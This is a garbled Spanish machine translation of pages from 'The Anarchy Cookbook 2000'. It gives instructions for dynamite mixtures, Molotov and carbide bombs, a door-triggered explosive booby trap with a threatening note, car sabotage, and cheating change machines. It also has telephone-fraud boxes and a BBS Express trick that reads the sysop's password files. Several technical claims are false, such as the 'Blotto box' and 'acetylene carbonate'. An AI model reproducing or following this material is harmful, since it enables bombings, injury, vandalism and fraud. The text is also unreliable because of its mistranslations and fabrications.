La caja de Blotto es el sueño de todos phreaks ... usted podría tener AT & T por debajo de su rodilla con este dispositivo. Porque, sencillamente, se puede desactivar las líneas de teléfono por todas partes. Nada. BLOTTO. No hay llamadas se les permite salir de un código de área, y no las llamadas se les permite entrar No se pueden hacer llamadas dentro de él, para el caso. Mientras el sistema de conmutación sigue siendo el mismo, este cuadro no se detendrá en un mero código de área. No se detendrán ante nada. Los impulsos eléctricos que emiten desde este cuadro se abrirá cada línea. Cada línea de la voluntad y el anillo y el anillo ... la tensión no se cortará hasta que la caja / generador se detiene. Esto no es un trabajo de 200 voltios, aquí. Estamos hablando GENERADOR. Cada línea de teléfono seguirá sonando, ypersonas cercanas a la caja puede ser electrocutado si se descuelga el teléfono. Pero, la caja Blotto puede ser detenida por simplemente el corte de la línea o generador. Si se cortan, entonces nada se emiten por más tiempo. Tomará un tiempo para que la caja a la calma hacia abajo de nuevo, pero eso no es más que un efecto posterior superficial. Una vez más: la construcción y el uso de esta casilla no se recomienda! La caja de Blotto continuará mientras no hay electricidad para continuar con. OK, eso es lo que hace, ahora, aquí están algunas cosas interesantes para que usted pueda hacer con él ...

Blotto Funciones / Instalación

Page 48: 106652012 the Anarchy Cookbook 2000 Es

Una vez que haya instalado su Blotto, no hay vuelta atrás. Las siguientes son las instrucciones para la construcción y uso de este cuadro. Por favor, lea y siga todas las advertencias en la sección anterior antes de intentar la construcción de esta caja de texto.

Materiales:• Un generador Honda portátil o una toma de corriente principal, como en un estadio o

un lugar similar.• Acoplador de 400 voltios nominal que empalma un enchufe hembra en una roseta de

teléfono.• Un medidor de tensión para insertarse en la propia caja.• Una base de color verde (es decir, una de las cajas agradables de alrededor de 3

'por 4' que usted ve alrededor de su vecindario. Son los cuadros de distribución principales y sería una línea más eficaz para empezar o una toma de teléfono regulares (no el suyo propio, y no en su código de área!)

• Un soldador y soldadura mucho.• Un mando a distancia o un palo de madera.

Ahora. Usted debe haber adivinado la construcción de eso. Si no, aquí va, voy a explicar en detalle. Tome el generador portátil Honda y todos los otros equipos en la lista y salir a la caza de una base de color verde. Asegúrese de que es uno en el suelo o colgando a nivel de la cabeza de un palo, no los grandes en la parte superior de los postes de teléfono. Ábrelo con cualquier cosa conveniente, si son dos cojones a continuación, débil, no lo intentes. Eche un vistazo en el interior ... que están a la caza de la coordinación de líneas de color verde y rojo. Ahora, saca tu cable de cuarto de radio y extraer lo medidor. Vuelva a colocar con el medidor de tensión alrededor. Un buen nivel para ajustar el voltaje a es de aproximadamente 1000 voltios. Ahora, coloque el medidor de voltaje en el cable y establecer el límite de un mil. Conecte el otro extremo del cable en el generador. Tome la toma de teléfono y el empalme de la parte de Jack. Ábrelo y coincidir con los cables rojo y verde con los otros cables de color rojo y verde.

NOTA: Si acaba de tener el generador y lo han hecho en el orden correcto, serás un bicho crujiente. Mantenga el generador hasta que la vaya a poner en marcha. Ahora, las líneas de soldadura, junto con cuidado. Envuelva la cinta pato o cinta aislante alrededor de todos los cables. Ahora, coloque el control remoto a la derecha en la puesta en marcha del generador. Si usted tiene el palo largo, asegúrese de que es muy largo y un paso atrás tan lejos como usted puede conseguir y alcanzar el polo más.

AVISO: Si se va derecha a lo largo de este sin leer el primer archivo, todavía doy cuenta de que su código de área está a punto de llegar a ser nula! A continuación, volver a estar, temblar el poste / mando a distancia y corre por tu maldita vida. En cualquier lugar, simplemente alejarse de ella. Se va a generar tanta electricidad que si usted está parado para cerrar usted se mata. El generador de fumar, etc, pero no se detendrá. Ahora están matando a su código de área, porque toda esa energía se propaga a través de todas las líneas telefónicas a su alrededor en todas direcciones.

Have a nice day!

La caja de Blotto: AftermathBueno, esto es, los planes para el más devastador y mortal en última instancia,cuadro jamás se haya creado. Me quito el sombrero a: Rey Blotto (por la idea original).

44. Pistola de aire por The Jolly Roger

En este artículo trataré de explicar el uso y la fabricación de un poderoso cerbatana y dardos para hacer el arma. La posesión de la pistola de aire comprimido se describe en este artículo es un delito grave. Así que ten cuidado donde vaya a utilizarlo. No quiero llegar a todos arrestado.

Se necesita:

Page 49: 106652012 the Anarchy Cookbook 2000 Es

1. Varios hilos de estambre (aproximadamente 2 pulgadas una pieza).2. Un lápiz normal.3. Una aguja larga de 2 ¼ pulgadas (esperemos que con un jefe de cuentas. Si no se

puede obtener, envuélvalo con cinta alrededor del extremo de la aguja.4. ¼ pies de la tubería. (PVC o aluminio) La mitad de una pulgada de diámetro.

La construcción de la flecha:

1. Con cuidado, gire y retire la pieza de metal (junto con el borrador) del lápiz hasta que se sale.

2. Tome Pin y empezar a poner sobre hebras de hilo de 5-7 sobre el pasador. Luego, empujar hacia arriba a la parte superior de la clavija. Pero no sobre la cabeza del pasador (o la cinta).

3. Empuje el pasador a través de la parte hueca de la cabeza donde el lápiz era antes.4. Eso debe de un dardo bonita. (Vea la ilustración)

# # # # #>>>>> ----- / # Es el hilo > Es la cabeza del lápiz - Es el pin que se auto- / Es la cabeza del pasador

Utilizando los dardos:

1. Ahora coge el dardo final e insertarla en el tubo (si es demasiado pequeño puesto en más de hilos).

2. Apunte el tubo a una puerta, pared, hermana, etc.3. Blow en el extremo de la tubería.4. A veces el extremo del tubo puede ser agudo. Cuando esto sucede, le sugiero que lo

envuelva con un poco de cinta aislante color negro. Se debe sentir mucho mejor.

45. Brown Box planes del Jolly Roger

Este es un mod bastante simple que se puede hacer a cualquier teléfono. Lo único que hace es permitir que usted tome cualquiera de las dos líneas en su casa y crear una línea de partido. Hasta ahora no he oído de nadie que tenga ningún problema con ella. Hay una cosa que usted nota cuando usted es una de las dos personas que se llame con una persona con una caja marrón. La otra persona hará sonar un poco débil. Yo podría superar esto con algunos amplificadores, pero entonces no sería muy muchos de estos hechos [¿Por qué no?]. Creo que la conveniencia de contar con dos personas en la línea a la vez que compensar cualquier pérdida de volumen menor.

Aquí está el diagrama:CLAVE: ___________________________________ | PARTE | Símbolo | | --------------------------------- | | HILO NEGRO | * | | CABLE AMARILLO | = | | CABLE ROJO | + | | CABLE VERDE | - | | SPDT | _ / _ | | _ / _ | | Alambre vertical | | | | Alambre horizontal | _ | ----------------------------------- * = - + * = - + * = - + * = - + * = - + * == _/_- +

Page 50: 106652012 the Anarchy Cookbook 2000 Es

******* _ / _ + + + + + + | | | | | | | | | | | | | _____PHONE____ |

46. Bomba de carburo de calcio por la Jolly Roger

Esto es extremadamente peligroso. Tenga mucho cuidado .... Obtener algunos de carburo de calcio. Este es el material que se utiliza en las lámparas de carburo y se puede encontrar en casi cualquier ferretería. Tomar unas pocas piezas de este material (se parece a la grava) y lo puso en un frasco de vidrio con un poco de agua. Ponga una tapa bien apretada. El carburo reaccionará con el agua para producir carbonato de acetileno que es similar al gas utilizado en los sopletes de corte. Finalmente, el vidrio con explotar de presión interna. Si dejas un trapo quemado cerca, usted recibirá un hermoso meteorito!

47. Más formas de Enviar un coche al infierno por el Jolly Roger

Debido a la gran cantidad de elogios, he escrito una actualización de archivo # 14. He dejado el original intacto. Esto amplía la idea original, y podría ser también llamada una secuela.

¿Cómo tener Phun con el automóvil de otra persona. Si realmente detesto a alguien, y me refiero a detestar, aquí hay algunos consejos sobre qué hacer en tu tiempo libre. Mueva las escobillas del parabrisas, y de inserción y tachuelas pegamento. Las tachuelas hacer diseños preciosos. Si su "amigo" va a la escuela con la que, justo antes de que salga de la escuela. Enciende un mechero y luego lo puso directamente debajo de la manija de la puerta en coche. Espera ... Deja ... Escucha. Cuando usted oye un sonoro "¡Mierda!", Usted sabe que él lo hizo a su coche en el tiempo. Retire la bufanda y vierta aproximadamente 1 taza de gas en el mismo. Ponga el silenciador de nuevo, y luego esperar hasta que su coche empieza. Entonces usted tiene un encendedor de cigarrillos. Un encendedor 30 pies de largo cigarrillo. Esto es efectivo, y cualquier tonto puede hacerlo. Quite el filtro de aire superior. ¡Eso es! O un viejo pero bueno: el azúcar en el tanque de gasolina. Cosas trapos empapados en gasolina hasta el tubo de escape. Entonces uno se pregunta por qué su "amigo" tiene problemas con sus pulmones o sus. Aquí hay uno que lleva tiempo y muchos amigos. Toma su / su coche a continuación entrar en su casa y volver a montarlo, en su vida o en el dormitorio. Phun ¿eh? Si usted está en los motores, por ejemplo moe EENI mina y el punto a algo y retírela. Se preguntan por qué algo no funciona. Hay muchos otros, pero los reales los jugosos por bien no venga pensando duro.

48. Se arrancaron los equipos de cambio por la Jolly Roger

¿Alguna vez has visto una de esas máquinas cambiador realmente grandes lavanderías en aeropuertos o salas de juego que dispensan el cambio cuando se pone en el billete de un dólar 1 o 5? Pues bien, aquí hay un artículo para usted.

1. Encuentra el tipo de máquina de cambio que se deslice en su factura de longitud sabio, no el tipo en el que puso la cuenta en una bandeja y luego deslice la bandeja!

2. Después de encontrar la máquina adecuada, conseguir un billete de $ 1 o $ 5. Inicio arrugando en una bola. A continuación, suavizar el proyecto de ley, ahora deben tener una superficie muy rugosa.

Page 51: 106652012 the Anarchy Cookbook 2000 Es

3. Ahora la parte difícil. Usted debe romper una muesca en el proyecto de ley en el lado izquierdo alrededor de ½ pulgada por debajo del pequeño símbolo de 1 dólar (véase la figura).

4. Si has hecho todo esto en ese momento tomar la ley y salir de la máquina. Ponga el proyecto de ley en la máquina y espere. ¿Qué debe suceder es el siguiente: cuando usted pone su cuenta en la máquina que piensa que todo está bien. Cuando se llega a la parte de la factura con la muesca, la máquina va a rechazar el proyecto de ley y (si lo ha hecho a la derecha) le dan el cambio, al mismo tiempo! Por lo tanto, se llega a una factura de vuelta, más el cambio! Puede ser que tome un poco de práctica, pero una vez que la caída de ella, usted puede conseguir un montón de dinero!

\ ----- Marca de primera clase aquí. Acerca de ½ "desde el 1.

49. Planes de desactivar la casilla de The Jolly Roger

La caja clara es un nuevo dispositivo que acaba de ser inventado que se puede utilizar en todo Canadá y Estados Unidos rural. La caja transparente trabaja en "pago tradicional" teléfonos públicos (Fones fortaleza). Esos son los teléfonos públicos que no requieren el pago hasta después de establecida la conexión. Usted toma el fone, un tono de llamada, marque su número, y luego insertar su dinero después de la persona responde. Si no depositar el dinero, entonces usted no puede hablar con la persona en el otro extremo debido a que su boquilla se corta la oreja, pero no por pieza. (Obviamente, estos teléfonos son agradables para llamadas gratuitas a tiempo o el tiempo u otras grabaciones de este tipo). Todo lo que debes hacer es ir a tu tienda cercana, o tienda de electrónica, y obtener un amplificador de cuatro transistores y una inducción de succión de teléfono taza de pick-up. La inducción de recogida se conectó como lo haría normalmente para grabar una conversación, excepto que sería conectado a la salida del amplificador y un micrófono se engancha a la entrada. Así que cuando la parte que se llama respuestas, la persona que llama puede hablar a través del micrófono pequeño en su lugar. Su voz, entonces pasa a través del amplificador y la bobina de inducción, y en la parte trasera del receptor, donde luego se transmite a través de las líneas telefónicas y la otra parte sería capaz de oír a su interlocutor. La caja transparente, por lo tanto "se aclara" el problema de no ser escuchados. Por suerte, la línea no será de corte después de una cierta cantidad de tiempo porque va a esperar por siempre para las monedas que se ponen in La ventaja más grande para todos nosotros acerca de este cuadro nuevo y claro es el hecho de que este tipo de teléfono público lo más probable llegar a ser muy común. Debido a un par de cosas: 1 ª, es una forma barata de conseguir la DTF, de tono de marcado, el primer servicio, segundo, que no requiere ningún equipo especial, (por la compañía telefónica) Este teléfono público funcionará en cualquier línea de teléfono . Por lo general, una línea de teléfono público es diferente, pero esto es una línea de teléfono regular y que se ha configurado para que el teléfono hace todo el de carga, no la compañía.

50. Lista de la CNA por la Jolly Roger

Plan Nacional de Acción TEL NÚMERO Plan Nacional de Acción TEL NÚMEROPlan Nacional de Acción TEL NÚMERO

201 201-676-7070 415 415-543-6374 709 Ninguno *** ***202 304-343-7016 416 416-443-0542 712 402-580-2255203 203-789-6815 417 314-721-6626 713 713-861-7194204 204-949-0900 418 514-725-2491 714 818-501-7251

Page 52: 106652012 the Anarchy Cookbook 2000 Es

205 205-988-7000 419 614-464-0123 715 608-252-6932206 206-382-5124 501 405-236-6121 716 518-471-8111207 617-787-5300 502 502-583-2861 717 412-633-5600208 303-293-8777 503 206-382-5124 718 518-471-8111209 415-543-2861 504 504-245-5330 801 303-293-8777212 518-471-8111 505 303-293-8777 802 617-787-5300213 415-781-5271 506 506-648-3041 803 912-784-0440214 214-464-7400 507 402-580-2255 804 304-344-7935215 412-633-5600 509 206-382-5124 805 415-543-2861216 614-464-0123 512 512-828-2501 806 512-828-2501217 217-525-5800 513 614-464-0123 807 416-443-0542218 402-580-2255 514 514-725-2491 808 212-334-4336219 317-265-4834 515 402-580-2255 809 212-334-4336301 304-343-1401 516 518-471-8111 812 317-265-4834302 412-633-5600 517 313-223-8690 813 813-228-7871303 303-293-8777 518 518-471-8111 814 412-633-5600304 304-344-8041 519 416-443-0542 815 217-525-5800305 912-784-0440 601 601-961-8139 816 816-275-2782306 306-347-2878 602 303-293-8777 817 214-464-7400307 303-293-8777 603 617-787-5300 818 415-781-5271308 402-580-2255 604 604-432-2996 819 514-725-2491309 217-525-5800 605 402-580-2255 901 615-373-5791312 312-796-9600 606 502-583-2861 902 902-421-4110313 313-223-8690 607 518-471-8111 904 912-784-0440314 314-721-6626 608 608-252-6932 906 313-223-8690315 518-471-8111 609 201-676-7070 907 Ninguno *** ***316 816-275-2782 612 402-580-2255 912 912-784-0440317 317-265-4834 613 416-443-0542 913 816-275-2782318 504-245-5330 614 614-464-0123 914 518-471-8111319 402-580-2255 615 615-373-5791 915 512-828-2501401 617-787-5300 616 313-223-8690 916 415-543-2861402 402-580-2255 617 617-787-5300 918 405-236-6121403 403-425-2652 618 217-525-5800 919 912-784-0440404 912-784-0440 619 818-501-7251 900 201-676-7070405 405-236-6121 701 402-580-2255406 303-293-8777 702 415-543-2861408 415-543-6374 703 304-344-7935409 713-861-7194 704 912-784-0440412 413-633-5600 705 416-979-3469413 617-787-5300 706 Ninguno *** ***414 608-252-6932 707 415-543-6374

51. Terrorismo electrónico por The Jolly Roger

1. Se inicia cuando un bobo grande, tonto te insulta groseramente. Ser de una disposición racional, inteligente, sabiamente elige para evitar una confrontación (directo). Pero a medida que se ríe en tu cara, tu sonrisa interior --- su venganza ya está planificada.

2. Siga su víctima a su casillero, el auto o casa. Una vez que haya elegido el sitio de destino, estaba de baja por una semana o más, dejando hervir la ira.

3. Por el momento, armar su kit versátil del terrorismo (detalles a continuación).

4. Plante su equipo en el lugar de destino designado en un lunes por la mañana entre las horas de 4:00 am y 6:00 am. Incluya una nota la calma, lo que sugiere que el silencio alude a la posibilidad de otro ataque. No lo escribas a mano! Un ejemplo de una nota de efectivo: ". No seas un idiota, o el próximo va a despegar la mano tenga un buen día." Observe cómo las infunde miedo tono tranquilo. Como si estuviera escrita por un psicópata homicida.

5. Seleccione una ubicación estratégica con vistas al sitio de destino. Trate de colocar de tal manera que pueda ver sus contorsiones faciales.

Page 53: 106652012 the Anarchy Cookbook 2000 Es

6. Siéntate y disfruta de los fuegos artificiales! Asamblea del kit terrorista versátil, económica y efectiva # 1: las piezas que usted necesita son los siguientes:

• 4 pilas AA• Una batería de 9 voltios• 1 relé de SPDT mini-(Radio Shack)• Un cohete de motor (bomba de humo o M-80)• Un solar de ignición (cualquier tienda de hobby)• Una batería de 9 voltios conector

1. Lleve la batería de 9 voltios y conectar a través de la bobina del relé. Este circuito también debe incluir un par de contactos que cuando separados cortar este circuito. Estos contactos se mantienen unidos por atrapándolos entre el armario, buzón o puerta del coche. Una vez que la puerta está abierta, los contactos se descompone y el circuito 9-voltios es roto, permitiendo que el relé a caer a la posición cerrada cerrando así el circuito de encendido. (Si todo esto es confuso, eche un vistazo en el esquema de abajo.)

2. Tome las 4 pilas AA y conectarlos en la sucesión. Conectar el terminal positivo de una al terminal negativo de otra, hasta que los cuatro están conectados excepto un terminal positivo y un terminal negativo. A pesar de que los cuatro pilas AA sólo se combinan para crear 6 voltios, el aumento de amperaje es necesario para activar el encendedor solar con rapidez y eficacia.

3. Tomar la batería (hecho en el paso 2) y el alambre de un extremo a un solo polo del relé y el otro extremo a una clavija del encendedor solar. Luego cablear la otra punta de la parte posterior del encendedor solar a la posición abierta en el relé.

4. Utilizando cinta adhesiva de doble cara alfombra montar el kit en su casillero, en el buzón o puerta del coche. Y por último, inserte el encendedor solar en el motor de cohete (bomba de humo o M-80).

El kit está completo!

---------> <--------- Yo (contactos) que I I - (BATERÍA) I --- I I (COIL) que ------ / / / / / / / ------- / ----------- / I / I / I (SWITCH), I I I --- (PILA) I - (PACK) I --- I I --------- I * (SOLAR DE ENCENDIDO)

52. Cómo iniciar una conferencia w / o 2600Hz o MF por The Jolly Roger

Page 54: 106652012 the Anarchy Cookbook 2000 Es

Este método de iniciar el conf. Depende de su capacidad de mierda el operador en la marcación de un número que sólo se puede llegar con los tonos MF de un operador. Cuando el operador de gilipolleces recuerdo operador no son contratados para pensar, sino hacer.

Aquí está una manera paso a paso a la conf.:

Llame al operador a través de un PBX o de extensión, usted podría llamar a uno a través de su línea, pero yo no lo recomendaría.

Diga al operador: ingeniero TSPS mantenimiento, anillo hacia adelante a 213 080 1100, la liberación de la posición, gracias (que probablemente le preguntará por el número de nuevo) Definiciones.: Anillo de avance le da instrucciones para marcar el número.Liberación de la posición de su encomienda para liberar el tronco después de haber marcado el número.+ - ¿Recuerdan a decir 213plus080 plus1100.

3. Cuando está conectado con la conf. Es voluntad aquí un silbato dos veces y una grabación le pedirá su número de operador. Marque en los cinco dígitos y golpear las libras firmar un par de veces. Sólo tiene que marcar el número de la línea de facturación etc. Cuando la grabación de pedirlo. Cuando en el modo de control de la conf. Pulse '6 'para transferir el control. Hit '001 'para volver a introducir el número de la cantidad de conferenciante y el tiempo que se dio cuando se quedó mirando la conf. Recuerde el tamaño puede ser desde los 2-59 conferenciante. No he encontrado a los límites de longitud.

53. Cómo hacer la dinamita por The Jolly Roger

La dinamita es nada más que la nitroglicerina y un agente estabilizador para que sea mucho más seguro de usar. Las cifras son porcentajes, asegúrese de mezclar estos con cuidado y asegúrese de utilizar las cantidades exactas. Estos porcentajes están en relación de peso, no volumen.

Número Ingredientes CantidadPrimera La nitroglicerina 32% El nitrato de sodio 28% Woodmeal 10% Oxalato de amonio 29% Algodón pólvora 1%Segundo La nitroglicerina 24% Nitrato de potasio 9% El nitrato de sodio 56% Woodmeal 9% Oxalato de amonio 2%Tercero La nitroglicerina 35½% Nitrato de potasio 44½% Woodmeal 6% Algodón pólvora 2½% Vaselina 5½% Polvo de carbón 6%Cuarto La nitroglicerina 25% Nitrato de potasio 26% Woodmeal 34% Nitrato de bario 5% Almidón 10%Quinto La nitroglicerina 57% Nitrato de potasio 19% Woodmeal 9%

Page 55: 106652012 the Anarchy Cookbook 2000 Es

Oxalato de amonio 12% Algodón pólvora 3%Sexto La nitroglicerina 18% El nitrato de sodio 70% Woodmeal 5½% Cloruro de Potasio 4½% Tiza 2%Séptimo La nitroglicerina 26% Woodmeal 40% Nitrato de bario 32% Carbonato de Sodio 2%Octavo La nitroglicerina 44% Woodmeal 12% Sulfato de sodio anhidro 44%Noveno La nitroglicerina 24% Nitrato de potasio 32½% Woodmeal 33½% Oxalato de amonio 10%10a La nitroglicerina 26% Nitrato de potasio 33% Woodmeal 41%11 La nitroglicerina 15% El nitrato de sodio 62,9% Woodmeal 21,2% Carbonato de Sodio 0,9%12 La nitroglicerina 35% El nitrato de sodio 27% Woodmeal 10% Oxalato de amonio 1%13 La nitroglicerina 32% Nitrato de potasio 27% Woodmeal 10% Oxalato de amonio 30% Algodón pólvora 1%14a La nitroglicerina 33% Woodmeal 10,3% Oxalato de amonio 29% Algodón pólvora 0,7% Percloruro de potasio 27%15a La nitroglicerina 40% El nitrato de sodio 45% Woodmeal 15%16a La nitroglicerina 47% Almidón 50% Algodón pólvora 3%17a La nitroglicerina 30% El nitrato de sodio 22,3% Woodmeal 40½% Cloruro de Potasio 7,2%18a La nitroglicerina 50% El nitrato de sodio 32,6% Woodmeal 17% Oxalato de amonio 0,4%19a La nitroglicerina 23% Nitrato de potasio 27½%

Woodmeal 37% Oxalato de amonio 8% Nitrato de bario 4% Carbonato de calcio ½%

Page 56: 106652012 the Anarchy Cookbook 2000 Es

Si parece que no puede conseguir uno o más de los ingredientes de probar con la otra. Si usted todavía no puede, siempre se puede comprar pequeñas cantidades de su escuela, o tal vez de las compañías químicas. Cuando se hace esto, asegúrese de hablar lo menos posible, si durante el año escolar, y se preguntan, dicen que es para un experimento para la escuela.

54. Escape de los automóviles Flame Thrower por The Jolly Roger

Para éste, todo lo que necesitas es un coche, una bujía, cables de encendido y un interruptor. Instale la bujía en los últimos cuatro o cinco centímetros del tubo de escape mediante la perforación de un agujero que el enchufe puede atornillar en fácilmente. Una el cable (este es el alambre aislado ordinario) a un lado del interruptor y la bujía. El otro lado del interruptor está conectado al terminal positivo de la batería. Con el coche en marcha, simplemente pulsa el interruptor y ver las llamas vuelan! Una vez más tener cuidado de que no hay nadie detrás de ti! He visto algunas de estas llamas van de 20 pies!

55. Entrar en BBS Express by The Jolly Roger

Si usted tiene suficiente nivel de acceso en cualquier BBS BBS Express, puede obtener la contraseña del Sysop, sin ningún problema y ser capaz de iniciar la sesión como él y hacer lo que quiera. Descargue el archivo de paso, eliminar las BBS enteros, cualquier cosa. Todo es cuestión de subir un archivo de texto y descargarlo de la BBS. Debe tener acceso lo suficientemente alta como para ver nuevas subidas para hacer esto. Si usted puede ver un archivo que acabas de subir usted tiene la capacidad de entrar en el BBS en unos pocos pasos. ¿Por qué estoy diciendo a todos esto cuando corro BBS expresarme? Bueno hay una forma de evitar que esto suceda y quiero Sysops otros a ser consciente de ello y no le suceda a ellos. De los frenos en todo se basa en la función de menú de BBS Express. Express permite crear un menú para mostrar diferentes archivos de texto poniendo la palabra MENU en la parte superior de cualquier archivo de texto, e indicando qué archivos se van a mostrar. Sin embargo, debido a un tornillo importante por el Sr. Ledbetter puede utilizar esta opción de menú para mostrar la USERLOG y contraseñas del Sysop o cualquier otra cosa que te gusta. Yo te mostraré cómo obtener la tarjeta de la Sysop y por lo tanto, inicie sesión como el Sysop. BB expreso Sysop tienen 2 contraseñas. Uno como todo el mundo se pone en forma de X1xxx, y una contraseña secundaria para que sea más difícil de hackear el paso Sysops. El pase de secundaria se encuentra en un archivo llamado SYSDATA.DAT. Este archivo debe estar en el disco 1 y por lo tanto, es fácil de conseguir.

Todo lo que tienes que hacer es subir este archivo de texto simple:

MENÚ1D1: SYSDATA.DAT

Estafa tiempo!

Después de cargar este archivo se descarga no Xmodem. Estúpido expreso piensase muestra un menú y verá lo siguiente:

Estafa tiempo!

Selección [0]:

Sólo tiene que darle una y Express mostrará el archivo SYSDATA.DAT. OPPASS es donde paso la secundaria Sysop será. D1: USERLOG.DAT es donde se encuentra el nombre y número de unidad del archivo USERLOG.DAT. El Sysop podría haber cambiado el nombre el archivo o ponerlo en un subdirectorio o incluso en una unidad diferente. Voy a suponer que lo deja como D1: USERLOG.DAT. Las otras partes de este archivo le dirá donde las pantallas de HLP. Son y donde el registro se guarda y todos los nombres de ruta de descarga.

Page 57: 106652012 the Anarchy Cookbook 2000 Es

Ahora bien, para obtener la tarjeta principal del Sysop de cargar un archivo de texto como este:

MENÚ1D1: USERLOG.DAT

Entrar en los BBS enurético

Una vez más, a continuación, descargar este archivo no Xmodem y verás:

Entrar en los BBS enurético

Selección [0]:

A continuación, golpeó una y el archivo de USERLOG.DAT tiempo viene volando hacia ti. El Sysop es la primera entrada en este archivo muy largo así que es fácil. Usted verá:

NOMBRE DEL SYSOP X1xxxAhora debería tener sus contraseñas 2.

Sólo hay una salida fácil de esto que me ocurre, y que es hacer que todos los archivos subidos nuevas ir a nivel de SYSOP (nivel 9) único acceso. De esta forma nadie puede quitar lo que acabo de explicar. Siento que esto es un error grave por parte de Mr. Ledbetter. Yo no sé por qué nadie había pensado antes. Me gustaría dar crédito a Redline para el mensaje que dejó en el infierno módem diciendo acerca de este problema, y también para Unka por sus ideas y sugerencias sobre la corrección de la misma.

56. Bombas incendiarias por parte de The Jolly Roger

La mayoría de las bombas incendiarias son botellas llenas de gasolina, simplemente con un trapo empapado en gasolina en la boca (la boca de la botella, no la tuya). El original cóctel molotov, y todavía lo mejor, era una mezcla de gasolina una parte, y una parte de aceite del motor. El aceite ayuda a que se aferran a lo que salpica el. Algunos utilizan una parte de brea y una parte de gasolina. Las bombas contra incendios se han encontrado que se hicieron mediante el vertido de cera derretida en la gasolina.

57. Fusible bomba de encendido por The Jolly Roger

Un fusible hebra cuatro casero se utiliza para esto. Se quema como el cólera. Se lleva a cabo hacia abajo y oculto por una tira de estaño doblada corte de una lata. El extremo expuesto de la mecha se sumerge en el encendedor bengala. Para usar éste, encender la mecha de la bomba y mantener el fuego hasta que el fusible se ha quemado fuera de la vista en la lata. A continuación, lanzar y cuando se rompe, la mecha encendida se encenderá el contenido.

58. Bomba genérica por el Jolly Roger

1. Adquirir un recipiente de vidrio.2. Poner en unas pocas gotas de gasolina.3. Tapar la parte superior.4. Ahora gire el contenedor alrededor para cubrir las superficies internas y luego se

evapora.5. Añadir unas gotas de permanganato de potasio (Obtener este material a partir de un

kit de mordedura de serpiente)6. La bomba se detona lanzando contra un objeto sólido.

Después de lanzar esta cosa, correr como el infierno. Esta cosa paquetes de ½ palo de dinamita.

Page 58: 106652012 the Anarchy Cookbook 2000 Es

59. Los planes de la Caja Verde de la Jolly Roger

El pago de la tasa inicial con el fin de utilizar una caja de color rojo (en ciertas fortalezas) dejó un sabor amargo en la boca de muchos boxeadores de color rojo, por lo que el cuadro verde fue inventado. El cuadro verde genera tonos útiles, tales como la moneda recogen, retorno de monedas, y llamadas entrantes. Estos son los tonos que los actos o del operador TSPS se envían a las emisiones de CO en su caso. Desafortunadamente, la caja verde no puede ser utilizado en la estación de fortaleza, sino que debe ser utilizado por la parte llamada.

Éstos son los tonos:Moneda recogen 700 1100 HzDevolución de monedas 1100 1700 HzTimbrado de 700 Hz 1700

Antes de la fiesta llamada envía cualquiera de estos tonos, una señal de liberación del operador debe ser enviada a alertar a los detectores de CO en el MF Esto se puede hacer mediante el envío de 900Hz 1500Hz + o un guiño solo 2.600 (90 m.) Además, no hay que olvidar que la velocidad inicial se recoge poco antes del período de 3 minutos es arriba. Incidentalmente, una vez que los tonos MF anteriores para recoger y devolver monedas alcanzar el CO, que se convierten en un adecuado pulso de CC (-130 voltios para el retorno y +130 para recoger). Este pulso es enviado hacia abajo la punta de la fortaleza. Esto hace que el relé de monedas para devolver o recoger las monedas. La supuesta "T-red" se aprovecha de esta información. Cuando un pulso de moneda de recolectar (130 VCC) se envía por la línea, debe estar conectado a tierra en alguna parte. Este suele ser el cable amarillo o negro. Así, si los cables están expuestos, estos cables se pueden cortar para evitar que el pulso de ser conectado a tierra. Cuando el período de tres minutos es casi inicial, asegúrese de que los cables negro y amarillo se cortan, a continuación, cuelgue, espere unos 15 segundos en el caso de un segundo impulso, vuelva a conectar los cables, tome el teléfono, y si todo va bien , debe ser "JACKPOT" tiempo.

60. Lanzagranadas portátiles por The Jolly Roger

Si usted tiene un arco, esto es para ti. Quitar la férula de una flecha de aluminio, y llenar la flecha con polvo negro (yo uso FFFF grado, que se quema fácil) y luego pegar una cartilla shotshell en el hueco dejado en el casquillo fue. A continuación, pega una munición en el primer, y ya está listo para ir! Asegúrese de que nadie está cerca .... Pequeños trozos de aluminio ir por todo el lugar!

61. Tutorial de Hacking por The Jolly Roger

¿Qué es la piratería?De acuerdo a la creencia popular el término hacker y la piratería informática fue fundada en el MIT, que viene de la raíz de un escritor de poca monta, alguien que mantiene la "piratería" en la máquina de escribir hasta que termine la historia. Un hacker sería la piratería en las obras para teclado o la contraseña.

Lo que usted necesita:Para hackear usted necesita un ordenador equipado con un módem (un dispositivo que le permite transmitir datos a través de líneas telefónicas), que debería costar entre $ 100 y $ 1200.

¿Cómo se puede hackear?La piratería requiere de dos cosas:1. El número de teléfono.2. Respuesta a los elementos de identidad.

¿Cómo encontrar el número de teléfono?Hay tres formas básicas para encontrar un número de teléfono computadoras:1. Exploración

Page 59: 106652012 the Anarchy Cookbook 2000 Es

2. Directorio3. Dentro de información

¿Qué está escaneando?Escanear es el proceso de tener un equipo de búsqueda de un tono de portadora. Por ejemplo, el equipo comenzará a las (800) 111-1111 y espere a que compañía si no hay ninguno que se vaya a 111-1112 etc Si hay una compañía que va a grabar para su uso futuro y seguir buscando más.

¿Qué es la asistencia de directorio?De esta manera sólo se puede utilizar si usted sabe dónde está su equipo de destino es. Por estaejemplo, dicen que está en Menlo Park,California y el nombre de la empresa es Lanka.

1. Marque el 411 (o el 415-555-1212)2. Diga "Menlo Park"3. Diga "Lanka"4. Anote el número de5. Pregunte si hay números adicionales6. Si es así ponerlos por escrito.7. Colgar en el operador8. Marcar todos los números que le dieron9. Escuche el tono de portadora10. Si escucha un tono compañía anote el número, llame a su módem y su conjunto de

hackear!

62. Los fundamentos de hacking II de The Jolly Roger

Principios básicos para saber antes de hacer cualquier cosa, esencial para continuar su carrera como uno de la élite en el país ... En este artículo, "La introducción al mundo de la piratería". tiene la intención de ayudar al que le dice cómo no quedar atrapado, lo que no se debe hacer en un sistema informático, qué tipo de equipo debo tener en cuenta ahora, y sólo un poco sobre la historia, el futuro de pasado, presente, por el hacker.

